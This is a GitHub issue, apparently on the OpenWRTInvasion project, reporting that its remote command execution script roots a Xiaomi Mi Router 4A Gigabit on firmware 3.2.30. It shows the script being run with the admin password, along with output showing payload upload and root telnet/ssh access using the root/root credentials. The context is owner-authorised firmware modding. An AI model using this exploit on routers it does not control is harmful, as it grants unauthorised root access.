[Success] Mi Router 4A Gigabit Edition (R4A) on firmware 3.2.30
symm opened this issue · 0 comments
Reporting success with the following methods:
- The original 0.0.1 offline which got me a shell
- Current master branch in MacOS (Ventura):
➜ OpenWRTInvasion git:(master) python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: {redacted}
There two options to provide the files needed for invasion:
- Use a local TCP file server runing on random port to provide files in local directory
script_tools.- Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)
router_ip_address: 192.168.31.1
stok: {redacted}
file provider: local file server
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49471. root='script_tools'
local file server is getting 'busybox-mipsel' for 192.168.31.1.
local file server is getting 'dropbearStaticMipsel.tar.bz2' for 192.168.31.1.
done! Now you can connect to the router using several options: (user: root, password: root)
- telnet 192.168.31.1
- ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
- ftp: using a program like cyberduck